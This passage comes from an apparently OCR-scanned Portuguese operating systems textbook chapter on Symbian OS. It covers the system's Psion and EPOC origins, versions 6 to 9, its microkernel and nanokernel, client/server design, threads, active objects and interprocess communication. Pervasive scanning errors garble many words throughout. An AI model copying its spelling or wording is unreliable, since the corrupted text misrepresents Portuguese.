positivos portaieis e teve rapido desenvolvimenio ao longo 
de varias versóes, 

_ 12.1.11 Raizes do sistema operacional 

Symbian: Psion e EPOC 

A historia do Symbian comeęa com alguns dos priinci- 
ros dispositiYos portaieis, que evolnfram no finał dos anos 
1980 como um meio de capturara utilidade dos computa¬ 
dores desktop em um pequeno pacote móveL As primei- 
ras temativas de computadores portaieis nao foram bem- 
■sucedidas; o Newton, da Apple, foi um dispositivo bem 
projetado, mas que se popularizou somentc entre poucos 
usLiarios. Apesar desse infcio lento, os computadores por- 
taieis desenvolvidos em meados dos anos 1990 foram mais 
bem deseńhados para o usuario c voltados a forma como as 
pessoas usavam dispositivos móveis + Os computadores por- 
tateis foram originalmente projetados como PD As — assis- 
tentes pessoais digitais que eram essencialmente organiza- 
dores eletrónicos — mas cvo!unam para abranger muitos 
lipos de lundonalidade. Conformę se dcsenvolvcram, efes 
comeęara m a funcionar como PCs desktop e passaram a ter 
as mesmas necessidades: pred$avam ser multitarefa; adi- 
donaram capaddade de armazenamento de varias lormas 
e necessitavam ser flexfveis nas areas de entrada e safda. 

Os dispositivos porlateis tambem cresceram para 
abranger comunicaęao. Conforme esses dispositivos pes- 
soais cresciam, a comunicaęao pessoal tambem se desen- 
volvia. O uso de telefones celulares teve um cresdmento 
dramatico no finał dos anos 1990. Por essa razao, foi natu¬ 
ra 1 fundir os dispositivos portaieis com os telefones celula¬ 
res para forma r os smartphones, Com essa fu sao, o sistema 
operacional que executava nos disposilivos portaieis icve 
de se desenvolver. 

Nos anos 1990, a Psion Computers fabricava dispositi- 
vos PDAs, Em 1991, a Psion produziu o Serie 3, um com- 
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putador pequeno com tela monocromatica HVGA, que 
cabia em um bolso. O Serie 3 foi seguido pelo Serie 3c, 
em 1996, com capaddade infravemielha adicional, e pelo 
Serie 3mx, em 1998, com urn processador mais rapido e 
com mais memória. Esses dispositivos foram urn grandę 
sucesso, em especial por conia do bom gerenciamento 
de energia e da intcropcrabilidade com outros compulado- 
res, incluindo PCs e outros dispositivos portateis. A progra- 
maęao era baseada na linguagem C, com um projeto orien- 
tado a objetos, e empregava mecanismos de aplicaęao 
{applkation engirm), uma parte da assinatura do deseń vol- 
yimento do sistema operacion.nl Symbian. A abordagem 
desse mccanismo era urna funcionalidade pode rosa. Como 
no projeto de micronudeo, da focava as funtionalidades 
nos mecanismos — que gerenciam as funęoes em respos- 
ta as solicitaęoes dos aplicativos e que funeionavam como 
servidores, Essa abordagem via biHzou a padronizaęao de 
uma AP1 c a utilizaęao da abstraęao dc objetos para quc o 
programador de aplicativos parasse dc sc preocupar com 
detalbes tediosos como o iormato dos dados, 

Ern 1996, a Psion comeęou a projetar um novo siste- 
ma opera don a 1 de 32 bits que dava suporte a dispositivos 
apontadores baseados cm unia icla dc toquc (touch screen) t 
usava mukimfdia c era mais rko cm comunicaęao. O novo 
sistema tambem era mais orle mado a objetos e devia ser 
transport* vel para diferentes arąuiteurras e projetos de dis- 
positivo. O resultado do esforęo da Psion foi a introduęao 
do sistema EPOC Release 1, programado em C++ e proje- 
tado para ser orieniado a objetos do comeęo ao Om. Ele 
novamcntc usou a abordagem dc mecanismos c expandiu 
a ideia do projeto para uma serie de semdores que coordena- 
vam o acesso a os servięos de sistema e dispositivos perifericos. 
O EPOC expandiu as passKbilidades de comunicaęao, abriu o 
sistema operacional para a tnclusao de recursos mułtimidla, 
introduziu novas piataformas para itens de interaęao como 
tclas de Loque e generalizou a interface dc hardware. 

Em segttida, o EPOC teve dois outros lanęamentos: 
o EPOC Release 3 (ER3) e o EPOC Release 5 (ER5), que 
executavam em novas plataformas como os computadores 
Psion Serie 5 e Serie 7. 

A Psion tambem procumu cnfallzar as formas com que 
seit sistema operacional podia ser adaptado a outras pla¬ 
taformas de hardware. Em terno do ano 2000, a maioria 
das aportu nidades para deseńvolvimcnto de novos compu- 
tadores portateis voltava«se aos telefones cclulares, cujos 
fabricantes ja procuravam por um noYO e avanęado sistema 
operacional para su a geraęao seguinte de dispositivos t Para 
aproYeilar as oportunkladcs, a Psion c os lidcrcs da indus- 
tria de telefonia móvel, incluindo Nokia, Ericsson, Motorola 
e Matstishita (Panasonic), form a ram um empreen di niemo 
conjnuto, denominado Symbian, que deveria assumir a 
propriedade e, em seguida, desenvolver o nucleo do sis- 
tema operacional EPOC. Esse novo projeto de nucleo foi, 
en tao, cha mado de sistema operacional Symbian. 


1ŁL2J Sistema operacionai Symbian 
versao 6 

Como a ultima vcrsao do EPOC era a ER5, o sistema 
operacional Symbian sitrghi na versao ó cm 2001, Ele apro- 
veitou as propriedades flextVeis do EPOC e foi dirccionado 
para varias plataformas diferentes. O sistema foi projeta- 
do para ser flemd o su (kicnie para atender aos requisitos 
para desenvolvimcnto de uma variedade de avatięados dis- 
positivos mÓYcis e telefones, enąuanto dava aos fabricantes 
a oporttmidade de diferendar sens produtos. 

Tambem foi deridido que o Symbian adotaria lecno- 
logias atuais a medida que fossem disponibilizadas. Essa 
decisao reforęott a opęao pcla orientaęao a objetos e pela 
arquitetura clknte-servidor, ja que das cstavam se tornan- 
do ampla menie difundidas no mundo dos PCs desktop e 
da Internet. 

A Ycrsao 6 do Symbian foi dita 'aberta' por seus pro- 
jetistas, o que era difereme das propriedades de 'código 
aberto' muitas vezes atribuidas ao UNIX e ao Linux. Por 
'aberta', os projetistas do Symbian ąueriam dizer que a cs- 
trutura do sistema operacional era publicada e dispomVel 
para todos. Alem disso, todas as i.nterfaces do sistema fo¬ 
ram publicadas para incentivar o projeto de software por 
tercciros. 

_ 12.1.31 Sistema operacional Symbian 

versao 7 

A versao ć do Symbian era basta me parecida com o 
EPOC e os predecessores da versao 6, tamo em projeto quan- 
to em funcionalidade. Ate entao, o foco tinha sido abranger 
a telefonia celular. Entretanto, a medida que mais e mais 
fabricantes projetavam telefones celularcs, Ii eon daro que 
atć mesmo a flcxibilidade do EPOC, um sistema para dispo- 
sitivos portateis, nao seria capaz dc atender a grandę quan- 
tidade de novos telefones que precisavam usar o Symbian. 

A yersao 7 manteve as funcionalidades de desktop do 
EPOC, mas a maior parte do interior do sistema foi rees- 
ciita dc forma a abranger os vanos tipos dc funcionalidade 
dos smartphoncs. O niideo c os servięos dc sistemas ope¬ 
racionais foram separados da interface com o usuario. O 
mesmo sistema operacional pode, en tao, ser executado cm 
diferentes plataformas de smartphones, cada qual usando 
um sistema distinto de interface com o usuario, O Sym¬ 
bian tambem foi expandido com vistas a tratar novos for- 
ma Los de mensagem que nao haviarn sido previslos antes, 
por exemplo r on entao ser usado em telefones que usavam 
tecnologias diferentes de telefonia. A versao 7 do Symbian 
foi lancada em 2003. 

_ 12.1.41 O sistema operacional Symbian 

boje 

O lanęamemo da versao 7 do Symbian foi muito im- 
ponante, pois trouxe abstraęao e flexibilidade ao sistema 
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operadonal. Eniretanto, essa abstraęao teve urn preęo e 
o desempenho do sistema operadonal logo se to mon um 
problcma qne demandava atenęao* 

Iniciou-sc cntao um projeto dc rceseritura total do sis¬ 
tema operacional, desta vez com foeo no desempenho, 0 
projeto do novo sistema deveria ma mer a flexibilidade da 
versao 7 e, ao mesmo tempo, aprimorar o desempenho e 
tor nar o sistema mais seguro. A versao 8 do Symbian, lan- 
ęada em 2004, aprimorou o desempenho do sistema, ern 
especial suas funęoes em tempo real. A versao 9, distribm- 
da a parrir de 2005, adirionou conceitos de seguranęa com 
base cm capacidade c induLu a insialaęao dc proteęao de 
portas. A vcrsao 9 tambćm disponibilizou para o hardware 
a ilexibilidade que a versao 7 adidonou para o software. 
Tambem foi desenvolvido um novo modelo bhiario que 
permitia aos desenvolvedores de hardware usar o Sym¬ 
bian sem precisar projetar o hardware para a tender a u ma 
arquiicmra especifica. 


12.2 


Uma visao geral do sistema 
operacional Symbian 


Como a scęao anterior dcnionstrou, o Symbian tor- 
nou-se um sistema espedhcamente direcionado ao desem¬ 
penho em tempo real em smartphones a partii de um siste¬ 
ma operacional de compuiadores portateis. Esta seęao fara 
uma introduęao aos conceitos do projeto do Symbian, que 
correspondem di rera men te a forma como o sistema opera¬ 
cional e Ltsado. 

Dentre os sistema* opera ci onais, o Symbian se destaca 
por ter sido projetado especiflca me me para os smartpho- 
ltcs. Ele nao c um sistema gcncrico adaptado (com grandes 
difkuldades) para os smarlphones, nem e uma versao dc 
um sistema operacional maior eriada para uma plataforma 
menor. Ha nele, lodav!a, muitas funęoes de sistemas ope- 
radonais mais robustos, desde a caracterfstka multitarefa 
ale o gerenriamemo de memória c questóes de seguranęa. 

Os antecessores do Symbian deram a de suas melho- 
res fundonalidades. Ele e orientado a objetos — heranęa 
do EPOC; usa o projeto de micronudeo, qtie minlmiza o 
custo de operaęao do nucleo e coloca no nfvcl de usuario 
as fundonalidades nao essenciais dos processos, como in- 
troduzido na vcrsao ó. Aleni disso, utiliza uma arquitctu- 
ra dieme/servidor que simtila o modelo de mecanismos 
empregado no EPOC; su porta varias fundonalidades de 
PCs desktop — como processamento multitarefa e multi- 
threading — e um sistema de armazenamento extensiVel. 
Do EPOC ele herdou tambem a enfase em comimicaęao e 
multimidia e os objetivos que motivaram a translęao para 
o sistema operadonal Symbian. 


12.2.11 Orientaęao a objetos 

Orientaęao a objetos e um termo que implica abs¬ 
traęao. Um projeto orientado a objetos cria unia entidade 


absirata cha mada de objęto de um dado e funcionalidade 
de um componente do sistema. Um objęto oferece fun- 
cionalidades e dados especfflcos, mas esconde detalhes de 
implementaęao. Quando bem implementado, um objęto 
pode ser removido c substituido por outro, desde que es- 
leja em conformidadc com a forma como os outros pe- 
daęos do sistema u sam esse objęto, isto e, desde que sua 
inierface se mamenha. 

Quando aplicada ao projeto de sistemas operacionais, 
a orientaęao a objetos faz com que todas as chamadas de 
sistema c funęoes do ntidco sejam fciias por mcio dc in- 
terfaces sem acesso cfctivo aos dados c sem dcpendencia 
dc qualquer lipo de implementaęao. Um nucleo orientado 
a objetos oferece servięos por md o de objetos. Quando 
utilizamos objetos no nucleo, a aplicaęao norma!men¬ 
ie recebe um deser i tor, isto e, uma referenda para um 
objęto c, cm seguida, acessa a inierface desse objęto por 
meio desse descritor. 

Por definięao, o Symbian e orientado a objetos. As im- 
plementaęóes das Faciiidades do sistema estao ocultas e a 
utiiizaęao dos dados e kila por meio de inierfaces defini- 
das em objetos de sistema. Enquanto um sistema operado- 
nal como o Linux cria um descritor de arquivos e usa esse 
descritor como um para metro em uma cha ma da open, o 
Symbian cria um arquivo do tipo objęto e chama o metodo 
open relacionado a esse objęto. Por exemplo, no Linux, e de 
amplo conhedmento o fato de os descritores serem indices 
iiiteiros de uma tabela na memória do sistema operacional; 
no Symbian, a implementaęao das tabdas do sistema de ar- 
quivose desconhedda, e sua manipulaęao e feita por meio 
de objetos de lima dasse especflica de arquivos. 

Notę que o Symbian se diferenda dos outros sistemas 
operacionais que usam os conceitos de orientaęao a obje¬ 
tos. Por exemplo, muitos projetos de sistemas utilizam tipos 
de dados abstratos e alguem poderia, inclusWe, argunientar 
que a ideia de uma chamada de sistema implementa abs- 
traęao ocultando dos program as do usuario os detalhes da 
implementaęao do sistema. No Symbian, a orientaęao a ob¬ 
jęłoś esta em toda a estrutura do sistema. As funcionalida- 
des e as chamadas de sistema estao sempre associadas aos 
objetos de sistema. A alocaęao e a profeęao de recursos sao 
focadas na alocaęao de objetos, e nao na implementaęao de 
chamadas de sistema. 

12.2.21 Projeto de micronudeo 

Com base na naturę za orientada a objetos do Symbian, 
a estrutura de seu nucleo tern um projeto dc micronudeo. 
Poucos arquivos e funęoes do sistema estao no nucleo; 
muitas funęoes i oram coloeadas em servidorcs no espaęo 
do usuario. O trabalho dos semdores e obier descritores 
dos objetos de sistema e fazer chamadas para o nucleo por 
meio desses objetos quando necessario. Em vez de fazerem 
chamadas de sistema, as apltcaęoes no espaęo do usuario 
interagem com esses semdores. 
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Os sistemas opera cionais baseados em micromideo 
geralmente ocupam bem menos memória em sua inicia- 
lizaęao e tern uma estru tura mais dinamica. Os servidores 
podem ser iniriados conforme a necessidade; nem todos 
sao solidtados na inidalizaęao do sistema, Os micronudeos 
cos! u mam ter urna arąuitctura acoplavel com suporte para 
módulos do sistema quc podem ser solidtados, caricgados 
c acopladós ao nudeo, Por essa razao, os micronudeos sao 
inuilo flexiveis: o código para dar suporte a u ma nova fun- 
donalidade (por exemplo l um novo driver de hardware) 
pode ser carregado e acoplado a qualquer momento* 

O Symbian foi projetado como um sistema operadonal 
baseado em micromideo. O accsso a os recursos do sistema 
ć leito por meio dc concxoes com servidores de recursos 
quc $ucessivamente coordcnam o accsso a esscs recursos. 
O Symbian usa unia arquiletura aeoplavel para novas irn- 
plementaębes, As novas impkmemaębes de funęoes de sisie- 
ma podem ser projetadas como objetos e inseridas no nudeo 
dinamicamente, Novos sistemas de arquivos podem, por 
cxemplo, ser impierncntados e adicionados ao nudeo en- 
quanto o sistema operadonal esta sendo execuiado. 

O model o dc micromideo tern alguns problemas. En- 
quamo nos sistemas opera cionais convendonais uma uni- 
ca chaniada de sistema e sufiriente, no micromideo e ne- 
cessaria a troca de mensagens, o que pode fazer com que o 
desempenho sofra com o custo adidonal da coiinmicaęao 
entre os objetos. A efidenda das funęoes que ficam no es- 
paęo do nudeo em sistemas coiwencionais diminui ąnando 
elas sao movidas para o espaęo do usuario. Por exemplo, o 
custo dc muitas chamadas de funęoes para agendar proces- 
sos pode diminuir o desempenho sc comparado ao agen- 
damenio de processos do ntideo do Windows — que tern 
acesso direto as estruuiras de dados do ntideo. Como as 
mensagens sao trocadas entre os objetos do espaęo do usua¬ 
rio e os do espaęo do nudeo, podem ocorrer alteraęoes de 
mveis de privilegio que complicarao ainda mais o desem¬ 
penho. Finalmente, enąuanto nos sistemas convendonais 
as chamadas de sistema traba]ham cm apenas um espaęo 
dc endercęamento, no Symbian essa troca dc mensagens 
c alteraęoes de prMIegio impiicam a utilizaęao de dois o u 
mais espaęos de endereęamento para que uma solidtaęao 
de servięos do micromideo seja implememada. 

Esses problemas de desempenho fizeram que os pro- 
jctistas do Symbian (e de outros sistemas baseados em mi- 
croniideo) prestassem basta nic atcnęao aos detalhes dc 
implementaęao, A cnfase do projeto se volta aos servidores 
simples e fortemente focados. 

12.2.3 I O nanonudeo do Symbian 

Os projelistas do Symbian resolveram os problemas do 
micromideo implementando uma estru tura de nanoriu- 
deo no ntideo do projeto do sistema operadonal, Assim 
como algumas funębes do sisierna sao movidas para servi- 
dores no espaęo do usuario em micronudeos, o Symbian 


separa as funęoes que requerem implementaęao sofisticada 
no ntideo e mantem apenas as funęoes mais basicas no 
nanoniicleo, que e o nudeo do sistema operadonal. 

O nanonudeo oferece algumas das funęoes mais ba¬ 
sicas do Symbian, Nele, operaędes simples de ihreads em 
modo prmlegiado realizam servięo$ bem primitivos, Entre 
as implememaęoes nesse nfvel estao a gen da men to e opera- 
ęoesde sincronizaęaa, tratamemode imerrupęoes e objetos 
de sincronizaęao como semafor os e mutexes. Nesse nfvel 
a maioria das funębes e preemptavel e bem primitiva (para 
que seja rapida). A ałocaęao dinamica de memória, por 
exemplo, e uma funęao muito complicada para a operaęao 
do nanonudeo. 

O projeto de nanonudeo reątier um segundo nfvd 
para a implementaęao das funębes de nudeo mais compli- 
cadas. A camada do nudeo no Symbian oferece as funębes 
de nudeo mais complicadas necessarias ao resto do sistema, 
Todas as operaębes no mvd do nucleo sao privilegiadas e 
se combinam as operaędes primitivas do nanonudeo para 
implementar funębes mais compkxas, 5ervięos de obje¬ 
tos complexos, threads no modo usuario, agendamento 
de processos e mudanęa de ccmtexio, memória dinamica, 
bibliotecas de carreganiemo dinamica, sincronizaęao com- 
plexa e a comunicaęao entre objetos e processos sao apenas 
algumas das operaębes realizadas nessa ca mada — que e 
totalmente preemptavel e na qual as imerrupęoes podem 
causar o reagendaniento de qualquer parte de sua exccu- 
ęao mesmo durantc as mudanęas de contexto, 

A Figura 12.1 mostra um diagrama compfeto da estru- 
tura do ntideo do Symbian. 

12.2.41 Acesso a recursos diente/servidor 

Conforme mencionamos, o Symbian explora o projeto 
de micromideo e usa o modelo clienie/servidor para accssar 
os recursos do sistema. As aplicaębes quc precisam aces- 
sar esses recursos do sistema sao os clientcs, e os progra- 
mas executados pelo sistema operadonal para coordenar 



I Figura 12.1 A estnjtura do nOcteo do Symbian tom varias 
camadas. 
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os acessos a esses recursos sao os servidores. Hnąuamo no 
Linux podemos chamar a funęao open para abrir Lim arqui- 
vo e no Windows podemos usar uma A PI para criar uma 
janela, no Symbian o proccdi niemo c o mcsmo para os dois 
ca sos: primeiro devc-se estabelecer urna conexao com urn 
semdor, que vai eon fi miar tal conexao e, emao, passara a 
rcceber as solicitaęoes dc execuęao de lunęócs especificas. 
Dessa forma, abrir um arquivo significa eiicontrar o servi- 
dor do arquivo, cha mar a funęao connecl para estabelecer 
a conexao com o servidor e, depois, enviar unia solicitaęao 
open com o nome de um arquivo espedfico. 

Ha varias vantagens nessa forma de proteger os recur¬ 
sos. Em primeiro lugar, da se encaixa no projeto do sistema 
operacional — como um sistema oriemado a objetos e ba- 
seado em microniicleo, Hm segundo lugar, essa arquitetura 
e cfiriente para gercnciar os varios acessos aos recursos do 
sistema que urn sistema operacional muititarefa c mu Ili- 
threaded pode solicttar, Finał menie, cada servidor pode se 
conccntrar nos recursos que deve gercnciar, podendo ser 
facilmente atualizado e substitmdo por novos p roje los. 

12-2.51 Funędes de um sistema 
operacional maior 

Apesar do tamanho dc seus computadores-aivo, o 
Symbian tern miii Las caracicnsiicas de scus irmaos maio- 
rcs. Embora seja possfve! encomrar no Symbian o lipo dc 
suporie do qual dispomos nos sistemas operadonais maio- 
res — como Linux e Windows —, as caractcristicas desse 
suporie sao diferenies (ainda quc muito semelhantes as 
dos sistemas maiores). 

Processos e threads: o Symbian e um sistema mul- 
tira ref a e multithrcad. Muitos processos podem eon- 
correr na execuęao, comunicar-se uns com os outros c 
utilizar multiplos threads quc sao exccutados no inte¬ 
rior de ca da proccsso. 

Su porte comum ao sistema de arquivos: assim 
como nos sistemas maiores, o Symbian organ iza o 
acesso ao armazenamemo do sistema usando um mo- 
delo de sistemas de arquivos. Ele tem um sistema de 
arquivos compatfvel com Windows (ulilizanda, por 
padrao, o sistema FAT-32); suporta outras implemen- 
taędes de sistemas de arquivos usando uma interface 
no estiio plug-in e suporta, ainda, FAT-16 e FAT-32, 
NTFS e muitos formatos de cartao dc memdria (como 
o JFFS, por exemplo). 

Redes: o Symbian suporta redes TCP/IP c varias ou¬ 
tras intcrfaces dc comunicaęao, como serial, infravcr- 
melho e Bluetooth. 

Gerenciamento de memória: ainda quc o Symbian 
nao use (ou nao len ha as facilidades para) o mapeamenlo 
dc memória virtual H de organiza o acesso a meinória 
em paginas e permite sua substituięao, ou seja, as pa- 
ginas podem en i rai; mas nao podem ser descartadas. 


12.2.61 Comunicacao e multimidia 

O Symbian foi criado para facilitar a comunicaęao de 
varias formas. Dificilmcnle podenamos dar uma visaogeral 
dek sem falar das funędes de comunicaęao. Sua moddagein 
de comunicaęao esta em eonformidade com a orientaęao a 
objetos, com a arquitelura de microniicleo e a de cliente/ 
servidor. As estru tura s de comunicaęao no Symbian esiao 
agrupadas em módulos, o quc permite quc novos mecanis- 
mos de comunicaęao sejam introduzidos no sistema fadl- 
menie. Os módulos podem ser escritos para implementar 
diferenies recursos, desde imerfaces no nfvel do usuario 
ale novas implemcniaęóes dc proiocolo para novos drivers 
de disposmvo. Em virtude de seu projeto dc micronutleo, 
novos módulos podem ser dinamicamente introduzidos e 
carregados no sistema operacional. 

O Symbian tem algumas caracieristicas limcas que vte- 
ram do foco nas piata formas de smanphone. Ele tem uma 
arquiietura de mensagens acoplavel — na qual novos tipos 
de mensa gem podem ser criados c implementados desen- 
volvendo-se módulos carregados no sistema dinamicamen¬ 
te pelos servidores de men sagę ni. O sistema de mensagens 
foi projetado em camadas, com tipos de objęto especiTicos 
em cada uma delas. Os objetos de transporte de mensa¬ 
gens, por excmplo f ficam separados dos objetos do lipo 
de mensagem. Uma forma de transporte de mensagens — 
digamos, o transporte por rede de celni ar seni fio (como 
CDMA) — poderia transportar varios tipos diferenies de 
mensagens (tipo mensagens de texto-padrao, SjMS, ou co- 
mandos de sistema como mensagens BIO). Novos metodos 
dc transporte podem ser introduzidos criando-se um novo 
objęto e carregando-o para o micleo. 

O Symbian leve sen nu cle o projetado com A Pis espe- 
cializadas para mullimfdia. Dispositivos e conteiidos mul- 
timfdia sao tratados por servidores especiais e por uma es- 
trutura que permite ao usuario implementar módulos que 
descrevcm conieudos novos c cxistentes e o que fazer com 
eles. Como na i nipie men ta ęao de mensagens, os conteiidos 
multimidia sao suportados por varios objetos, projetados 
para interagirem entre si. A forma como os sons sao toca- 
dos e projetada como um objęto que interage com a forma 
pela qua! cada formato de som e implementado. 


12.3 


Processos e threads no 
Symbian 


O Symbian e um sistema operacional muititarefa que 
utiliza os conceitos de processos e threads como os outros 
sistemas, Entretanto, a estmtura do micleo do Symbian e 
a maneira como cle aborda a poss(vel escassez dc recursos 
iniluendam a forma como ele vc os objetos muititarefa. 


12.3.11 Threads e nanothreads 

No lugar de processos como a l^ase fiara o [irocessa- 
menio muitiiarefa, o Symbian favorece os threads e e cons- 
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iruido em torno do conceito de thread, que formam a uni- 
dade central do processamento multitarefa* Um processo 
ć vlsio pdo sistema opcracional simpksmente como um 
conjunto de threads com um bloco de comrole de proces- 
sos e algum espaęo de memória. 

O su porte a tlireads no Symbian e baseado no nanonu- 
cleo com nanothreads. O nanonucleo proporriona apenas 
su porte simples dos tlireads, cada thread suportado por um 
nanothread baseado em nanonucleo. Este oferece agenda¬ 
mento de nanothreads, sincromzaęao (comumcaęao mter- 
threads) e servięos de temporizaęao* Os nanothreads sao 
CKecuiados cm modo prWikgiado e precisam dc urna pilha 
para armazenar as informaęoes de ambiente de tempo de 
execuqao, nao podendo ser exccutados em modo usuario. 
Isso significa quc o sistema pode manter urn contmle rigido 
sobre des, Cada nanothread precisa de um conjunto mmi¬ 
mo de dados para ser exeaitado: basicameiue, a loealizaęao 
e o tamanho dc sua pilha. O sistema opcracional controla 
lodo o rcslo, como o código usado por cada tliread, e arina- 
zena o contexto dos threads em suas pilhas de execuęao, 

Assim como os processos, os nanothreads tambem pos- 
snem estados* O modelo tililizado pclo nanonucleo do Sym¬ 
bian tem alguns estados alem do modelo basico. Sao eles: 

1. Suspenso. £ quando um thread suspende outro, 
mas dc forma difercnie do estado de espera, cm que 
um thread e bloqtieado por algum objęto de ca mada 
superior (por exempio, um thread do Symbian). 

2, Espera por semdforo rapido, Um thread ricssc 
estado esta esperando pela sinalizaęao de um se¬ 
mafora rapido — um tipo dc variavel sentinela. Os 
semaforos rapidos sao semaforos do nanonucleo* 

B. Espera DFC Um thread nesse estado esta esperan¬ 
do que urna chamada atrasada de funęao on DFC 
{ddayedfunction cali) seja adicionada a fila DFC, As 
DFCs sao usadas na implementaęao de drivers de 
disposittvos e representam chamadas ao nucleo que 
podem ser listadas e agendadas para execuęao pela 
camada do nucleo no Symbian* 

4. Dormindo. Os threads adornieddos estao esperando 
pela passagem de um periodu de tempo especifico. 

5. Outro. Ha urn estado gen er i co usado quando os de¬ 
seń volvedores implementam estados extras para os 
nanothreads* Elcs o utilizam ąuando cxpandcrn as 
funęoes do nanonucleo para novas piata formas de 
telefones (chamadas de camadas personalizadas), e 
aqueles que o utilizam tambem devem implemen- 
tar as formas de transięao entre esses estados c suas 
impl ement a ęoes est e ndi das. 

Compare a kicia dc nanothreads com a kicia convcn- 
cional dc um processo. Um nanothread e essencialmenie 
um processo mais lcvc. Ele tem um minicontexto que e 
altcrnado confonne os nanothreads vao passando pclo 
processador. Cada nanothread tem um estado, como nos 
processos. As principais caracterislicas dos nanothreads sao 


o comrole rigido que o nanonucleo tem sobre eles e a mi¬ 
nima quantidade de informaęao que compoe o contexto 
de cada um. 

Os threads do Symbian sao baseados nos nanothreads; 
o nticlco adiciona suporte ao que o nanonucleo ofcrece* 
Threads do modo usuario usados por aplicaędes-padrao sao 
implemeniadns pelos threads do Symbian, Cada thread do 
Symbian cantem um nanothread e adiciona sua própria 
pilha de cxeeuęao a pilha usada pclo nanothread* Esses 
threads podem operar no modo nucleo por mcio de cha¬ 
madas de sistema e o Symbian tambem adiciona trata men¬ 
to de exceę5es e sinalizaęoes de safda a implementaęao. 

Os threads do Symbian implementam sens próprios 
conjuntos de estados □ partir da implementaęao dos na¬ 
nothreads, Como des adicionam algumas fundonalidades 
a implementaęao sini pies dos nanothreads, os novos esta¬ 
dos refletem as nom ideias usadas nos threads do sistema* 
O Symbian inclui sete novos estados em que os threads 
podem estar, focados em condięoes bloqueantes especiais 
que podem ocorrer. Esses estados especiais indueni espe¬ 
ra e suspemao por semaforos (normais), variavcis mutcx 
e variaveis condicionais* fi bom lembrar que, como a im¬ 
plementaęao dos threads do Symbian e baseada nos nano¬ 
threads, esses estados sao implementados de acordo com 
os estados nos nanothreads, usando, na maioria das vczcs, 
scu estado suspenso, dc varias formas. 

12.3.21 Processos 

Os processos no Symbian sao threads agmpados sob 
uma iinica estrutura de comrole de blocos de processos 
com um unico espaęo de memória. Pode haver um ou 
varios threads de execuęao sob um bloco de controle de 
processos. Os conceitos dc estados e agenda mento de pro¬ 
cessos ja foram definidos pelos threads e nanothreads do 
Symbian. O agendamento de urn processo e, entao, im¬ 
pl ement ad o por meio do agendamento de um thread e da 
[nicializaęao do bloco de comrole de processo adequado ao 
atendimento das solidtaęoes dc dados do thread* 

Os threads do Symbian organizados sob um linico pro- 
cesso funcionam de varias formas* Primeiro, ba um unico 
thread principal marcado como o ponto de partida do pro¬ 
cesso. Segundo, os threads compartilham os parametros de 
esca łona mento. Mudanęas de parametros do processo, ou 
seja, do metodo de escalonamento, mudam os parametros 
dc todos os threads. Tercciro, os threads compartilham ob- 
jetos de espaęo de memória, mcluindo dispositivos e outros 
descritores de objetos* Por firn, quando tam processo e fina- 
lizado, o nucleo elimina todos os threads no processo. 

_ 12.3.31 Objetos ativos 

Os objetos ativGs sao formas especializadas de threads, 
implementados visando a aliviar a carga quc eles impóem 
sobre o ambiente operacional* Os projetistas do Symbian 
re eon bece ram o fato de que haveria mtiitas siiuaęóes em 
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que um thread em uma aplicaęao seria bloqueado. Como 
o foco do Symbian esta na commiicaęao, muitas aplicaęóes 
te ni um padrao de implementaęao semelhante: clas gravam 
informaęoes em um soqueic de comunicaęao ou enviam 
infonnaęoes por um canal e H emao, ficam bloąueadas en- 
ąuanto esperant por urna resposta do receptor, Os objetos 
alivos sao projetados para que, quando voltem do esta do 
de bloąueio, ten barn apenas um porno de emrada para o 
código chamado; isso simplifiea su a implememaęao, Como 
sao execuiados no espaęo do usuario, os objetos ativos tern 
as propriedades dos threads do Symbian; portanto, pos- 
suem sens próprios nanothreads e podern ser agrupados 
junto a outros threads do Symbian para formar um proces- 
so do sistema opera cional, 

Se os objetos ativos sao simplesmeme threads do Sym¬ 
bian, algueni poderia perguntar por que seria vantajoso 
para o sistema operacional ter um modelo simplificado de 
thread, A importancia dos objetos ativos esta no escalona- 
memo. En q u anto esperam por evemos, todos os objetos 
ativos ficam em um unico processo e podern atuar como 
um thread para o sistema, O nudeo na o prccisa chccar 
continuamente os objetos ativos procurando por aąucles 
que podern ser desbloąueados, Assim sendo, os objetos ali- 
vos em um processo podern ser coordenados por um es- 
calonador implemcntado em um unico thread. Os objetos 
ativos sao uma versao eficiente e leve dos threads-padrao, 
visto que combinam em um unico thread códigos que se¬ 
riom de outra maneiro implementados em varios threads, 
fixam pornos dc emrada no código c usam um unico escalona- 
dor para coordcnar sua cxccuęao. 

E importante perceber ornie os objetos ativos se cncai- 
xant na estru tura de processos do Symbian, Quando um 
thread convendonal faz uma cha ma da de sistema que blo- 
queia sua execuęao no esta do de espera, o sistema opcracio- 
nal ainda prccisa veiificar o thread. Dura mc as mudanęas 
dc contcxto, o sistema operadonal vai perder tempo vcri- 
ficando os processos b!oqueados no estado de espera para 
delcrminar sc algum dclcs prccisa ser movido para o estado 
de pronto. Os objetos ativos sc autocolocam no estado dc 
espera e aguardani por um evento especifico. Por essa razao, 
o sistema operadonal nao predsa ficar verificando esses ob¬ 
jetos, mas deve move-los quando scti evento especifico for 
iniciado. O resullado ć uma quamidade menor de verifica- 
ęócs de threads e um desempenho mais rapido. 

12.5.41 Comunicaęao entre processos 

Em um ambientc dc miiltiplos threads como o Sym- 
bian, a comunicaęao entre processos e crucial para o de¬ 
sempenho do sistema. Os threads, especialmente na forma 
de semdores de sistema, se comunicam constantemente. 

Om soąuete e o modelo mais basico de comunicaęao 
usado pclo Symbian, Ele c um pipelinc dc comunicaęao abs- 
traia entre dois pontos* A abslraęao e usada para ocultar o 
gerenciamento dos dados e os metodos de transporte entre 


os destinos. O conceito de soquete e usado pelo Symbian 
para a comunicaęao entre dientes e senidores, threads e 
dispositivos e entre os threads. 

O modelo de soąuete tambem forma a base dos dispo- 
sitivos de E/$. Novamente, a abstraęao e essencial para tor- 
nar este modelo tao util. Todos os mecanismos de troca de 
informaęao entre dispositivos sao gerenciados pelo sistema 
operacional em vez das aplicaęóes. Por exemplo, soąuetes 
que traballiam sobre TCP/iP em um ambiente de rede po- 
dem ser facilmente adaptados para irabaihar em um am- 
biente Bluetooth mudando-se os parametros no tipo de 
soąuete usado. A ma tor parte das outras trocas de dados ć 
feita pelo sistema operadonal, 

O Symbian implementa os princtpios de sincronizaęao- 
-padrao encontrados nos sistemas operacionais de uso ge- 
rai. Yarias formas de semaforos e mutexes sao amplamente 
utiiizadas no sistema, o qne propórciona a sincronizaęao de 
processos e threads. 


12.4 


Gerenciamento de memória 


O gerenciamento dc memória em sistemas como Linux 
c Windows emprega mu kos dos conceitos ab orda dos neste 
livro sobre implemcntaęao do gerenciamento de memória. 
